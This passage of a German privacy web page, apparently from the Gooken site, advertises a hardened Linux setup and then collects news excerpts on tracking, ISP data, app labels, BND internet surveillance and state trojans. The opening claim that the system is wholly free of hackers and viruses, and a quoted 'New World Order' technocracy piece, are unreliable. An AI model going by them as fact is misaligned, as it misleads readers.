inzwischen 195 mal sammel-gepatchte 5.4) ganz ohne Hacker und Trojaner, frei von Viren und Würmern, frei von Wartung, Firewall linfw3 auf iptables, ebtables, ggfls. arptables und stets gesperrten Superuser-Root-Netzverbindungen, Port-Scan-Detektor (psad), System-Vollverschlüsselung (FSE, Full System Encryption), sichere Ende-zu-Ende-Verbindungen (TLS 1.3), wenig Root-Prozesse (nur X und Kernel), X/X11-Server mit --no-tcp, Eigner-, Zugriffsrechte, Intergritäts-Rechte und ACL, Passwortschutz auf alle Passwörter selbst imfalle ihrer Bekanntgabe außer Passwort für LUKS-login zur Entschlüsselung der Root-Partition, Sperrung aller Konten außer Benutzerkonten und Superuser Root, auf allen Konten einschließlich root außer surfuser gesperrte Login-Shells (/sbin/nologin und/oder firejail), noexec-home-partitions, Updates von 2010 bis 2024 und länger, ..., keine Trackingskripte, Skriptfilter, Third-Party-Skript- und Image-Blocker, keine Spyware, keine Werbung, keine Cookies (falls erforderlich: Sitzungscookies), Sandbox firejail usw., Browser innerhalb Sandbox firejail: Konqueror und Pale Moon, Pale Moon Sicherheits-Erweiterungen, Anonymisierung (Onion Router Tor), uneingeschränktes Internet, lokaler DNS-Cache (lokal -> pdnsd -> Tor-DNS), anonymisierte DNS-Abfrage, E-Mail-Client kmail mit Spamfilter (bogofilter, spamassassin, ...), alles auf mausklick-schneller, stromsparender Lifetime-Hardware (für fast umsonst), crash- und virenfreies (und zuguterletzt austauschbares) BIOS mit eigenen Views und tiefgreifenden Zugriffsrechten, ..., alles OpenSource. Zero by Gooken noticed "Universal Linux" errata since 2021 Gleich vorab: Wer kann Ihren Browserverlauf und die von Ihnen besuchten Webseiten sehen?, Marko Grjuic, vpnoverview.com, 06.02.2023 Schützen Sie sich vor neugierigen Augen online! Wann immer Sie online sind, gibt es tonnenweise Parteien, die versuchen werden, Sie auszuspionieren, von den Websites, die Sie besuchen, bis hin zu Regierungen und Suchmaschinen wie Google. Auch Internet-Dienstleister können viel von dem sehen, was Sie online tun. Es wird immer wichtiger, sich vor Parteien zu schützen, die Sie ausspionieren. [...] Seit Projekten wie WikiLeaks und Whistleblowern wie Edward Snowden wird immer deutlicher, dass viele offizielle Institutionen ständig mithören und die eigene Privatsphäre wird zum immer größeren Thema. Wer hört mit? Welche Parteien haben meine persönlichen Daten? Welche Organisationen verfolgen mein Surfverhalten und was genau sehen sie? All diese Fragen beantworten wir hier. Wer sieht mich im Internet? Es gibt viele Methoden, mit denen Dritte Sie im Internet verfolgen können. In der folgenden Tabelle haben wir einige aufgelistet, mit denen Sie rechnen können. Die rechte Spalte erläutert, wer welche Informationen haben könnte und was sie damit tun könnten. WER SIE SIEHT, WAS SIE WISSEN KÖNNTEN Internetanbieter (Internet service providers, ISP) - kann sehen, welche Webseiten und sozialen Medien Sie nutzen, wem Sie E-Mails schreiben - kann möglicherweise Details zu Ihrer Gesundheit und zu Ihren Finanzen sehen - kann Ihre Daten möglicherweise bis zu 6 Monaten speichern (abhängig von der örtlichen Gesetzgebung) - ist verpflichtet auf Nachfrage alle Daten, die über Sie gespeichert wurden, herauszugeben (für EU-Bürger) Ihr (WLAN-) Netzwerkadministrator - kann sehen, welche Webseiten und sozialen Medien Sie nutzen, wem Sie E-Mails schreiben - kann NICHT sehen, was Sie genau in Formulare auf HTTPS-Seiten eintragen Meistens gehört Ihr Arbeitgeber zu dieser Kategorie Betriebssystem - kann sehen, welche Webseiten und sozialen Medien Sie nutzen, wem Sie E-Mails schreiben - kann Ihren Standort sehen (wenn aktiviert) - ist verpflichtet, auf Nachfrage alle Daten herauszugeben, die über Sie gespeichert wurden (für EU-Bürger) Webseiten - kann Ihr Onlineverhalten auf manchen Seiten sehen - arbeitet meistens mit Cookies - kann Werbung personalisieren, basierend auf Ihrem Online-Verlauf Suchmaschinen - kann Ihren Suchverlauf sehen - kann Ihre Suchergebnisse sehen - Google hat alle Daten von allen Plattformen, auf denen Sie Google-Produkte nutzen Apps - kann Ihren Standort, Kontodaten und E-Mail-Adresse sehen - unterschiedlich von App zu App Tipp: Achten Sie besonders auf die Datenschutzerklärung von Apps Behörden/Regierungen - kann Ihren Internet Service Provider bitten, Ihre Browsing-Daten zu übergeben - kann online-Verhalten aufzeichnen, um (Cyber-)Kriminalität zu bekämpfen Tendieren dazu, Ihre Freiheit und Privatsphäre im Internet einzuschränken Hacker - kann möglicherweise Ihren Browserverlauf, Login-Daten und finanzielle Informationen sehen Abhängig von der Art des Angriffs https://vpnoverview.com/de/privatsphaere/anonym-surfen/wer-kann-internetverhalten-browserverlauf-sehen/ Was weiß Ihr Internetdienstanbieter über Sie?, Marko Grujic, vpnoverview.com, 10.01.2023 Ihr Internet Service Provider oder ISP weiß vielleicht mehr über Sie, als Sie denken. Er sieht: Die Domains, die Sie besuchen Er kann sogar sehen, welche Seiten Sie besuchen (z.B. welche Videos Sie sich ansehen) Alle Informationen, die Sie auf Websites eingeben Zum Glück gibt es eine einfache Möglichkeit, sich vor spionierenden Internetanbietern zu schützen: die Verwendung eines VPN. Ein VPN verbirgt Ihre IP-Adresse und verschlüsselt Ihren Datenverkehr, so dass er für Ihren ISP und Dritte, die in Ihren Daten herumschnüffeln, nicht lesbar ist. Andere Optionen sind: Die Verwendung eines Proxy-Servers Verwendung des Tor-Browsers ... Tor-Browser: Dreifacher Schutz vor Ihrem ISP? Der Tor-Browser ist ein ausgezeichnetes Werkzeug zum Schutz der Privatsphäre. Richtig eingesetzt, macht er es Ihrem Internetanbieter praktisch unmöglich zu sehen, was Sie online tun. Der Tor-Browser leitet Ihren Internetverkehr nämlich über mindestens drei seiner vielen Server (die über die ganze Welt verteilt sind). Bei jedem Server (Knotenpunkt) wird Ihr Datenverkehr erneut verschlüsselt, so dass Ihr Datenverkehr extrem gut geschützt ist. Für einen noch besseren Schutz empfehlen wir die Verwendung des Tor-Browsers in Kombination mit einem VPN ( ... bei Orbot (Tor) bereits IN EINEM, Anm. Gooken ). https://vpnoverview.com/de/privatsphaere/anonym-surfen/was-weiss-ihr-internetdienstanbieter/ Doch bevor wir an dieser Stelle fortfahren, geben wir eine kurze Einführung in die gesamte Thematik mit Auszügen aus unserer Sektion News&Links: Technokraten führen die Welt in ein neues dunkles Zeitalter, uncut-news.ch, 16.07.2021 Bevölkerungskontrolle und oder Neue Weltordnung (NWO) Die Versprechen der Technokraten von einer brandneuen und besseren Welt sind so hohl wie ein leerer Luftballon. Ihre Politik treibt die Welt in eine wissenschaftliche Diktatur und eine neue Ära des Neo-Feudalismus, der die Freiheit erdrückt. Die Zeit, die Technokratie abzulehnen, ist jetzt! https://uncutnews.ch/technokraten-fuehren-die-welt-in-ein-neues-dunkles-zeitalter/ Unser Reden (Gooken, Anm.): Tauschen Sie nicht echte Freiheit gegen falsche Sicherheit, uncut-news.ch, 02.06.2022 USA/DAS IMPERIUM Von Ron Paul. Er ist ein US-amerikanischer Arzt und Politiker. Er ist Mitglied der Libertarian Party und war zwischen 1976 und 2013 (mit Unterbrechungen) als Republikaner Abgeordneter im Repräsentantenhaus der Vereinigten Staaten. Paul war bei der US-Präsidentschaftswahl 1988 Kandidat der Libertarian Party und bewarb sich parteiintern um die republikanische Kandidatur zu den US-Präsidentschaftswahlen 2008 und 2012. https://uncutnews.ch/tauschen-sie-nicht-echte-freiheit-gegen-falsche-sicherheit/ MacOS und Windows Apps können heimlich filmen, tagesschau.de, 13.07.2022 Betriebssysteme von Computern schützen unzureichend vor Spionage durch Apps. Das zeigt ein Experiment von BR-Datenjournalist:innen und PULS Reportage. Ein Sicherheitsrisiko gerade in Zeiten von Homeoffice. Von Sebastian Bayerl, Maria Christoph, Rebecca Ciesielski, Pia Dangelmayer, Elisa Harlan, Robert Schöffel, BR Die Corona-Pandemie hat die Kommunikation in der Arbeitswelt grundlegend verändert: Ob morgendliche Videokonferenz oder Meeting am Nachmittag, Videocalls mit aktivierter Kamera sind für viele Arbeitnehmerinnen und Arbeitnehmer Normalität. Dabei birgt das Arbeiten von zuhause in Bezug viele Risiken für die Datensicherheit. https://www.tagesschau.de/investigativ/br-recherche/sicherheit-homeoffice-101.html Krasse Sicherheitslücke entdeckt: So zerlegen sich Virenscanner selbst, CHIP, 28.04.2020 Virenscanner sollen Windows eigentlich vor Gefahren schützen. Doch Forschern ist es gelungen, den Schutz zur Gefahr zu machen. Über symbolische Links zwischen Verzeichnissen konnten nicht nur 28 namhafte Virenscanner ausgetrickst werden, die Schutzsoftware ließ sich auch so manipulieren, dass sie sich selbst und Windows unbrauchbar machen konnte. [...}] Virenscanner bergen auch Risiken. Der Grund ist einfach, die Tools arbeiten mit den umfassendsten Rechten auf dem System, die es gibt. Gelingt es Angreifern eine Schwachstelle zu finden, steht Windows mit runtergelassenen Hosen da. Genau das ist Sicherheitsforschern gelungen. [...] Das Tool der Wahl für den Angriff sind verknüpfte Verzeichnisse, wie man sie unter Windows mit dem Befehl "mklink /j" erstellen kann. Das kann jeder Nutzer unter Windows erledigen, Adminrechte braucht es dafür nicht. Der Angriff nutzt dabei die grundlegende Arbeitsweise eines Virenscanners aus https://www.chip.de/news/Sicherheitsluecke-Virenscanner-zerlegen-sich-selbst_182651458.html Visualisiert: Mit diesen 600 Firmen teilt Paypal deine Daten, netzpolitik.org, 23.01.2018 Seit dem 1. Januar 2018 gewährt der Online-Zahlungsdienst PayPal Einblick in die Liste der Firmen, mit denen er "möglicherweise" persönliche Informationen seiner Nutzer teilt. Rebecca Ricks hat die sage und schreibe 600 Firmen visualisiert. https://netzpolitik.org/2018/visualisiert-mit-diesen-600-firmen-teilt-paypal-deine-daten/ Facebook fragte Banken nach Nutzerdaten, PC-WELT.de, 07.08.2018 Facebook hat laut einem Medienbericht bei mehreren großen US-Banken angefragt, um von diesen Kundendaten zu bekommen. https://www.pcwelt.de/a/facebook-fragte-banken-nach-nutzerdaten,3451879 ä Google kennt Ihre Online-Einkäufe via Gmail-Tracking, PC-WELT.de, 20.05.2019 Google ist in der Lage, alle Online-Einkäufe der Nutzer zu tracken, auch wenn diese nicht via Google getätigt wurden. https://www.pcwelt.de/news/Google-kennt-Ihre-Online-Einkaeufe-via-Gmail-Tracking-10594891.html Google trackt Mastercard-Nutzer Bericht: Google verfolgt Nutzer offline mit Mastercard-Daten, PC-WELT.de, 31.08.2018 Laut einem Bloomberg-Bericht kauft Google Kunden-Daten von Mastercard, um Kunden auch offline zu tracken. Wie die News-Plattform Bloomberg berichtet, ist Google wohl einen Deal mit Mastercard eingegangen, um Offline-Einkäufe von Kreditkarten mit Nutzerkonten zu verknüpfen. Für die Daten von 70 Prozent aller Mastercard-Inhaber der USA aus dem Jahr 2017 soll Google demnach mehrere Millionen US-Dollar gezahlt haben. Darin enthalten sind Transaktionsdaten, die für Google ausreichen, um Personen eindeutig zu identifizieren. [...] Laut den Angaben von Bloomberg sind sich aber beide Unternehmen wohl darüber bewusst, dass hier jede Menge Datenschutz-Probleme auftauchen. Der Deal wurde daher nur zögerlich eingegangen. Vier Jahre wurde zwischen den zwei Unternehmen verhandelt, bevor der Deal abgeschlossen wurde. Mastercard-Inhaber wurden darüber hinaus nicht über das Tracking informiert. Zwar gäbe es in Googles Web-Console eine Möglichkeit das Tracking zu untersagen, jedoch ist dies für den Großteil der Nutzer nicht ersichtlich. [...] Der Bloomberg-Bericht bezieht sich nur auf die USA. Ob Google in weiteren Ländern ähnlich vorgeht, geht aus dem Artikel nicht hervor. In den Vereinigten Staaten machen Umsätze mit Mastercard rund 25 Prozent des gesamten Umsatzes aus. https://www.pcwelt.de/a/bericht-google-verfolgt-nutzer-offline-mit-mastercard-daten,3452190 Bei 80 Prozent der untersuchten Apps, die angeblich keine Daten erfassen, findet doch Tracking statt Apple-Datenschutzlabels Großteil angeblich trackingfreier iOS-Apps sammelt heimlich Daten, netzpolitik.org, 20.01.2022 Apps auf dem iPhone tragen leicht verständliche Labels, die zeigen sollen, auf welche Daten sie zugreifen. Doch bei 80 Prozent der untersuchten Apps, die angeblich keine Daten erfassen, findet doch Tracking statt. Das zeigt eine Analyse des Informatikers Konrad Kollnig für netzpolitik.org. Eine klare Ansage schmückt viele Angebote in Apples App-Store: "Keine Daten erfasst". Seit einem Jahr sind für Apps in Apples Betriebssystem iOS klare Datenschutzlabels verpflichtend. Sie sollen zeigen, ob und welche Daten die App an ihre Betreiber:innen oder Dritte weitergibt. Viele Apps behaupten, keine Daten von Nutzer:innen zu sammeln. Doch zahlreiche Labels sind offenkundig falsch - das zeigt eine technische Auswertung, die netzpolitik.org exklusiv einsehen konnte. Der Informatiker Konrad Kollnig von der Universität Oxford hat 1,682 zufällig ausgewählte Apps aus Apples App-Store untersucht. 373 der getesteten Apps (22,2 Prozent) geben an, keine persönlichen Daten zu erfassen. Vier Fünftel davon, 299 Apps, kontaktierten jedoch sofort nach dem ersten App-Start und ohne jegliche Einwilligung bekannte Tracking-Domains. (Hier mehr Details über die Methode, eine Veröffentlichung der Daten soll bald folgen.) Eine prominente App aus Kollnigs Datensatz: "RT News" des russischen Staatssenders. Die App gibt an, keine Daten zu erfassen. Kollnig machte die Probe aufs Exempel, er lud sie auf sein Testgerät und steuerte ein paar beliebige Artikel an. Insgesamt schickte die RT-App an 19 Domains Daten weiter. Allerdings nicht nach Russland, sondern an Trackingdienste der US-Konzerne Facebook und Google, die Marktforschungsfirma ComScore und den Werbekonzern Taboola. Eigentlich müsste eine solche Datensammlung im Datenschutzlabel angegeben werden, sagt Kollnig. Denn darin könnten sensible Informationen stecken, etwa über die Artikel, die sich Nutzer:innen in der App angesehen hätten. "Leider ist häufig unklar, welche Daten wirklich gesammelt werden und was mit diesen Daten geschieht." Besondere Vorsicht sei bei Apps geboten, die Zugriff auf den GPS-Standort haben, sagt der Informatiker. Wie Recherchen der New York Times gezeigt hätten, landen solche Standortdaten oft in den Händen von Datenfirmen, die sie zum Verkauf anbieten - ein klarer Fall von Missbrauch. Wie viel an Tracking durch Apps passiert, untersuchen Kollnig, ein Doktorand am Informatikinstitut der Universität Oxford, und seine Kolleg*innen seit längerer Zeit. Zuletzt veröffentlichten sie eine Analyse von fast zwei Millionen Android-Apps im renommierten Journal Internet Policy Review. Ihre Ergebnisse sprechen Bände: Seit Wirksamkeit der Datenschutzgrundverordnung mit Mai 2018 habe sich wenig an der Lage verändert, rund 90 Prozent der Apps in Googles Play Store können demnach direkt nach dem Start Trackingdaten an Dritte schicken. Für seine Analyse der iOS-Apps wählte Kollnig nach dem Zufallsprinzip Apps aus, die seit Januar 2020 in Apples Appstore zu finden sind und nachträglich ein Datenschutzlabel erhalten haben. Der Informatiker installierte die Apps automatisiert auf ein iPhone 8 mit dem aktuellen Betriebssystem iOS 15.2. Dort wurde jede App geöffnet, sonst fand aber keine Interaktion mit den Apps statt - auch keine Einwilligung zum Tracken. Anschließend untersuchte Kollnig den Datenverkehr zwischen dem Handy und dem Internet durch einen zwischengeschaltenen Rechner, einen sogenannten Man-in-the-middle-Proxy. Einige Apps installierte er zusätzlich zu Testzwecken manuell. Apples Datenschutzlabels ernten Kritik Grundsätzlich setzt Apple beim Datenschutz höhere Maßstäbe als andere Unternehmen, verkauft teilweise Produkte nach dem Konzept Privacy-by-Design. Doch Datenschutz und Privatsphäre sind auch Teil von Image und Marketing des Unternehmens, mit denen Konzernchef Tim Cook bei großen europäischen Datenschutzkonferenzen die Halle füllt. Im Dezember 2020 führte Apple die Datenschutzlabels in seinem Store ein, "damit du besser verstehst, wie Apps deine Daten verarbeiten." Apple musste sich aber bereits seit Beginn Kritik an den Labels gefallen lassen. Mehr als ein dutzend falscher Behauptungen in App-Labels fand Washington-Post-Kolumnist Geoffrey A. Fowler im Januar 2021, darunter auch bei einer für Kinder gemachten Video-App und einem beliebten Spiel. Im Kleingedruckten der Labels sei zu lesen, dass Apple die Informationen der Anbieterfirmen gar nicht prüfe - die Angaben würden nur in vereinzelten Stichproben kontrolliert. Gleichlautende Vorwürfe erntet Apple auch später. Ein Jahr später bleibt die Situation ähnlich: Kollnig fand in seiner Analyse zahlreiche beliebte Apps, die deutlich mehr Daten sammeln als behauptet. Etwa die Puzzle-App einer großen Spielefirma, die entgegen ihres Labels eine ID-Nummer von Nutzer:innen an zahlreiche Trackingdienste schickt. Oder die App des britische Met Office, des nationalen Wetterdienstes. Diese sendet heikle Informationen wie GPS-Daten an Google und Amazon und sammelt - ohne Ankündigung im Label - auch eine Nutzer:innen-ID. Apple wollte zu der Analyse Kollnigs auf Anfrage von netzpolitik.org nicht konkret Stellung nehmen. Von dem Konzern hieß es lediglich, dass die Informationen in den Labels von den Entwickler:innen stammten, Apple aber vor allem die beliebtesten Apps im Rahmen seines Review-Prozesses auf die Richtigkeit der Angaben kontrolliere. Oft wissen App-Betreiber:innen selbst nichts von Tracking Dass so viele Daten aus beliebten Apps bei Dritten landen, hat aus Sicht des Informatikers Kollnig einen praktischen Grund. Trackingdienste würden üblicherweise über sogenannte Bibliotheken in Apps integriert. Bei Bibliotheken handelt es sich um fertige Unterprogramme, die bestimmte Aufgaben in einer App erledigen. Deren Nutzung erleichtert Programmierer:innen die Arbeit, bedeutet aber weniger Kontrolle über die fertige App. Denn viele Bibliotheken stammen von Konzernen wie Google, und in ihnen ist der Tracking-Code versteckt. "App-Betreiber haben häufig keine Möglichkeit den Programmcode dieser Bibliotheken nachzuvollziehen, da die Trackingunternehmen ihren Code üblicherweise nicht öffentlich machen", sagt Kollnig. Das Tracking bietet App-Anbieter:innen eine Möglichkeit, durch personalisierte Werbung Geld zu verdienen. "Der Wunsch von App-Betreibern nach finanziellen Einnahmen ist verständlich", sagt der Jungwissenschaftler. Doch das Geschäft gehe zu Lasten der Nutzer:innen, die kaum über die gesammelten Daten Bescheid wüssten. Grund dafür seien auch die großen Tech-Konzerne, die es App-Betreiber:innen erschwerten, auf datenschutzfreundliche Alternativen zu setzen. Damit sich daran etwas ändere, müsste geltendes EU-Datenschutzrecht konsequent in die Praxis umgesetzt werden, sagt Kollnig. https://netzpolitik.org/2022/apple-datenschutzlabels-grossteil-angeblich-trackingfreier-ios-apps-sammelt-heimlich-daten/ Bis zu eine Billion Internetverbindungen täglich Auslandsgeheimdienst So überwacht der BND das Internet, tagesschau.de, 15.05.2020 Nach Informationen von BR und "Spiegel" kann der BND offenbar auf mehr als eine Billion Internetverbindungen täglich zugreifen. Nächste Woche wird in Karlsruhe entschieden, ob die Überwachung rechtens ist. [...] Das hängt auch mit der Daten-Auswertung zusammen, die der BND betreibt. Die Daten werden ihm unbearbeitet von deutschen Internet-Austauschknoten übergeben, auf Anordnung des Kanzleramtes hin. 23 solcher Knoten gibt es hierzulande, mit dem DE-CIX in Frankfurt am Main steht dem BND auch der Knoten mit dem weltweit höchsten Datendurchsatz zur Verfügung. Techniker des DE-CIX stellten im Oktober 2019 auf Nachfrage des Verfassungsgerichtes Berechnungen an, um die Größe der Datenmenge abzuschätzen. Derzeit werde "ein durchschnittliches Volumen von rund 47,5 Billionen IP-Verkehrsverbindungen täglich vermittelt". Der BND sei technisch in der Lage, jeden Tag auf 1,2 Billionen Internet-Verbindungen aus dieser Gesamtmenge zuzugreifen. Bevor der BND die Daten auswertet, werden sie in einem ersten Schritt anhand von IP-Adressen gefiltert. In einem der Dokumente führt die Bundesregierung aus, dass IP-Adressen "in Bezug auf eine Verortung auf Länderebene zu 96 bis 98 Prozent genau" seien. Doch nimmt man die mehr als eine Billion Verbindungen, die der BND täglich ausleiten kann, würden 24 Milliarden Rohdaten nicht umgehend gelöscht, wie vorgesehen, sondern einer weiteren Filterstufe zugeführt. Die Internet-Verbindungen werden in einem zweiten Schritt automatisiert nach Meta- und Inhaltsdaten untersucht, also konkret geführten Gesprächen. Metadaten zeigen zum Beispiel, wer mit wem telefoniert, wann und wie lang. Mehr als 100.000 Suchbegriffe werden verwendet: von Telefonnummern und E-Mail-Adressen bis hin zu Namen chemischer Stoffe, mit denen sich Massenvernichtungswaffen herstellen lassen. [...] Snowden enthüllte globale Überwachung In welchem Ausmaß der BND über Jahre Telekommunikationsdaten abgegriffen und an den US-Geheimdienst NSA weitergeleitet hat, wurde durch die Enthüllungen des Whistleblowers Edward Snowden im Juni 2013 und im daraufhin vom Deutschen Bundestag eingesetzten NSA-Untersuchungsausschusses deutlich. Das Gremium beschäftigte sich unter anderem mit dem Projekt "Eikonal". Dabei erfasste der BND mindestens von 2004 bis 2008 über einen Kabelknoten der Deutschen Telekom in Frankfurt am Main Daten und leitete sie an den US-Geheimdienst NSA weiter - offenbar ohne wirkliche rechtliche Grundlage. Nach wie vor ist umstritten, ob sich darunter auch Daten deutscher Staatsbürger befunden haben. Ein Mitarbeiter der beim BND zuständigen Abteilung, den der NSA-Untersuchungsausschuss mehrfach als Zeugen vernommen hatte, wies entsprechende Medienberichte damals zurück: "Meines Wissens wurde aus diesem Ansatz kein Datum eines Deutschen abgeleitet." Grüne und Linke zogen am Schluss der Ausschussarbeit ein gegenteiliges Fazit: "Eikonal wuchs dem BND über den Kopf." Unter anderem deswegen trat am 31. Dezember 2016 ein neues BND-Gesetz in Kraft. Für Armin Schuster - auch er wie von Notz Mitglied im PKGr - ist die Kontrolle des BND bereits jetzt streng: "Deutschland wirft im weltweiten Datenmeer nicht ein Schleppnetz aus, sondern arbeitet mit der Harpune und das wird intensiv kontrolliert." In Berlin rechnet man aber damit, dass in Karlsruhe der Beschwerde zumindest in Teilen stattgeben wird. https://www.tagesschau.de/investigativ/br-recherche/bnd-urteil-101.html Dossier: Staatliche Überwachung, netzpolitik.org, 2021 Von angezapften Unterseekabeln über die neueste Ausweitung von Staatstrojanern bis zum Datenmissbrauch durch Polizeibeamte - wir berichten seit Jahren über staatliche Überwachungsmaßnahmen und ihren Einsatz. Damit ihr keine tiefgreifenden Änderungen verpasst und den Überblick behaltet, sammeln wir in diesem Dossier alle unsere Artikel zum Thema staatlicher Überwachung. Wir bleiben für euch dran. https://netzpolitik.org/staatliche-ueberwachung/ ... https://netzpolitik.org/2021/neues-dossier-zu-ueberwachung-auf-dem-laufenden-bleiben/ https://netzpolitik.org/2017/chronik-des-ueberwachungsstaates/ https://netzpolitik.org/2021/ueberwachungsgesamtrechnung-mehr-als-die-summe-der-einzelteile/ https://netzpolitik.org/2021/forschungsbericht-schockierendes-ausmass-von-biometrischer-ueberwachung-in-europa/ https://netzpolitik.org/2021/finfisher-wir-verklagen-das-bka-auf-den-staatstrojaner-vertrag/ https://netzpolitik.org/2021/staatstrojaner-pegasus-wir-muessen-die-gesamte-ueberwachungsindustrie-in-frage-stellen/ ... Studie Wie Chefs ihre Angestellten überwachen, netzpolitik.org, 21.09.2021 Digitale Überwachung ist in vielen Arbeitsplätzen inzwischen Realität geworden. Eine umfassende Studie untersucht nun gängige Technologien und Systeme, die sich oft in einem rechtlichen Graubereich bewegen. Viele Angestellte werden in ihrer Arbeit überwacht. Eine Studie untersucht nun gängige Technologien und Systeme. (Symbolbild) - Alle Rechte vorbehalten IMAGO / Panthermedia Keine Frage, die Zeiterfassung am Arbeitsplatz ist digital viel praktischer als mit analoger Stechkarte. Doch beim Aufschreiben von Zeiten bleibt es oft nicht: Längst können solche Systeme etwa Daten über Arbeitstätigkeiten erfassen und festhalten, mit welchen Projekten oder Kund:innen sich Mitarbeitende wie lange beschäftigt haben. Später lassen sich diese Daten für Abrechnungen nutzen oder mit anderen Datenquellen vernetzen. Firmen wollen damit betriebliche Abläufe optimieren, während Arbeitnehmer:innen zunehmend gläsern werden. "Unternehmen können digitale Überwachung und Kontrolle nutzen, um Arbeit zu beschleunigen und zu verdichten, Freiräume einzuengen oder Beschäftigte leichter ersetzbar zu machen", sagt Wolfie Christl. In einer 150 Seiten starken Studie hat der österreichische Datenschutz-Aktivist für die NGO Cracked Labs untersucht, wie weit die digitale Überwachung am Arbeitsplatz inzwischen fortgeschritten ist. Die Studie ist Teil des Projekts "Gläserne Belegschaft" und wurde mit Hilfe österreichischen Gewerkschaften und der Arbeiterkammer Wien erstellt. https://netzpolitik.org/2021/studie-wie-chefs-ihre-angestellten-ueberwachen/ Bildschirmaufnahme in Windows 10: So einfach gehts, CHIP, 27.01.2022 Möchten Sie Ihren Bildschirm unter Windows 10 abfilmen, können Sie die gleichen Screencast-Tools wie unter älteren Windows-Versionen anwenden. Wir erklären Ihnen, wie auch in der neuen Windows-Version ein Screencast gelingt. Mit der richtigen Tastenkombination geht es super einfach. https://praxistipps.chip.de/windows-10-bildschirm-abfilmen-so-klappt-der-screencast_42476 12.000 Satelliten SpaceX startet erste Satelliten für Überall-Internet, PC-WELT.de, 23.02.2018 SpaceX hat zwei eigene Satelliten ins Weltall geschossen. Rund 12.000 weitere Satelliten sollen folgen. Für Überall-Internet! [...] Elon Musks (Tesla, siehe unter News&Links#Alternativen) Raumfahrt-Unternehmen SpaceX transportiert mit seinen Falcon-9-Raketen schon länger Satelliten ins Weltall. Dabei handelte es sich bisher aber immer um Kundenaufträge, die Satelliten stammten also nicht von SpaceX selbst. An diesem Wochenende soll laut The Verge eine Falcon-9-Rakete aber neben einem solchen Kundenauftrag - dem Erdbeobachtungssatelliten Paz for Spain - auch noch zwei weitere Satelliten ins All bringen, die den Anfang legen für das neue Satellitennetz von SpaceX. Es soll in der finalen Ausbaustufe aus 12.000 Satelliten bestehen. 4.425 Satelliten sollen zunächst in einer Höhe zwischen 1.110 und 1.325 Kilometer um die Erde fliegen. Später sollen weitere 7.518 Satelliten in einer Höhe zwischen 335 km und 346 km folgen. Die Satelliten sollen auf unterschiedlichen Frequenzen funken. Angesichts der großen Zahl an Satelliten sollte dieses Netz zu ziemlich jeden Punkt der Erde rund um die Uhr mit Internet versorgen können. Die Satelliten übertragen ihre Datenverbindungen an Antennen auf der Erde. SpaceX will mit Starlink mächtig Geld verdienen. Für das Jahr 2025 rechnet SpaceX mit 40 Millionen zahlenden Nutzern für sein Satelliten-Internet, die zu 30 Milliarden US-Dollar Jahresumsatz in die Kasse spülen sollen. Zuvor muss SpaceX allerdings den enormen technischen Aufwand bewältigen (Koordination der Satelliten, Ausrichtung der Antennen) und von der Federal Communications Commission die erforderlichen Freigaben für die benötigten Funkfrequenzbereiche erhalten. Wobei die FCC bereits ihr Wohlwollen für das ambitionierte Vorhaben zum Ausdruck gebracht hat. Die ersten Starlink-Satelliten sollen 2019 ihren regulären Betrieb aufnehmen. https://www.pcwelt.de/a/spacex-startet-erste-satelliten-fuer-ueberall-internet,3449792 Wie alles anfing Fünf Jahre Kampf gegen Ende-zu-Ende-Verschlüsselung, netzpolitik.org, 02.12.2020 Die Regierungen der EU-Mitgliedstaaten wollen ihre Polizeien und Geheimdienste befähigen, Ende-zu-Ende-verschlüsselte Kommunikation zu umgehen oder mit technischen Werkzeugen auszuhebeln. Ein Rückblick. https://netzpolitik.org/2020/wie-alles-anfing-fuenf-jahre-kampf-gegen-ende-zu-ende-verschluesselung/ Überwachung 36 Millionen Euro: ZITiS baut Supercomputer zur Entschlüsselung, netzpolitik.org, 16.10.2018 Die Hacker-Behörde ZITiS will einen Hochleistungsrechner bauen, um verschlüsselte Daten zu entziffern. Das geht aus dem 36 Millionen Euro teuren Haushaltsentwurf der Behörde hervor, den wir veröffentlichen. Nach wie vor sucht ZITiS Staats-Hacker, aktuell ist nur die Hälfte der Stellen belegt. Die IT-Behörde ZITiS soll nächstes Jahr 36,7 Millionen Euro bekommen, 20 Prozent mehr als dieses Jahr. Die vor anderthalb Jahren gegründete "Zentrale Stelle für IT im Sicherheitsbereich" hilft Polizei und Geheimdiensten bei der technischen Überwachung. Wir veröffentlichen an dieser Stelle das bisher unveröffentlichte ZITiS-Kapitel aus dem Bundeshaushalt sowie eingestufte Informationen aus dem Bundesinnenministerium. Von diesem Geld wollen die staatlichen Hacker "hochmoderne technische Ausstattung" kaufen. Ganz oben auf der Wunschliste steht ein Hochleistungsrechner, "der vorrangig im Bereich der Kryptoanalyse genutzt wird" - also zur Entschlüsselung. Dieser Supercomputer hat "höchste Priorität" für die ZITiS-Abnehmer Verfassungsschutz, Bundeskriminalamt und Bundespolizei. Vor zwei Wochen wurde bekannt, dass ZITiS auch einen Quantencomputer einsetzen will. Ob Supercomputer und Quantencomputer verschiedene Projekte sind, will ZITiS auf Anfrage nicht verraten: "Zu unseren Projekten und verwendeten Technologien können wir keine Auskunft geben." Da die Entwicklung nutzbarer Quantencomputer jedoch noch in den Kinderschuhen steckt, dürfte der Hochleistungsrechner ein eigenes Projekt sein, der zeitnah in Betrieb gehen soll. Staatstrojaner für mobile Endgeräte In den anderen Arbeitsfeldern rüstet ZITiS ebenfalls auf, wobei zwei besonderes Gewicht erhalten. Im Bereich der Digitalen Forensik forscht und entwickelt ZITiS unter anderem an "Passwortsuche" und der "Auswertung von Smartphones". Bisher haben Polizeibehörden sieben verschiedene Software-Tools gekauft, um beschlagnahmte Mobilgeräte auszulesen. Dieser Wildwuchs soll bei ZITiS vereinheitlicht werden. Im Bereich Telekommunikationsüberwachung (TKÜ) arbeitet ZITiS an zwei Projekten, die bisher beim BKA angesiedelt waren. ZITiS setzt das "Projekt INTLI" (Internationale Zusammenarbeit in der TKÜ) fort, "das sich mit der Standardisierung des Austauschs von TKÜ-Daten auf Grundlage der Rahmenrichtlinie Europäische Ermittlungsanordnung beschäftigt". Die EU-Richtlinie ermöglicht grenzüberschreitende Überwachung von Telekommunikation. ZITiS will auch die Entwicklung von Staatstrojanern vorantreiben. Mit dem "Projekt SMART" soll ZITiS das BKA unterstützen "bei der Entwicklung einer Quellen-TKÜ-Lösung für mobile Endgeräte", also einem Trojaner zum Abhören von Kommunikation. Das BKA hatte für sechs Millionen Euro den Staatstrojaner "RCIS" programmiert, der seit diesem Jahr auch Smartphones infizieren und abhören kann. Jetzt wollen ZITiS und BKA die Software gemeinsam weiterentwickeln. Hacker gegen 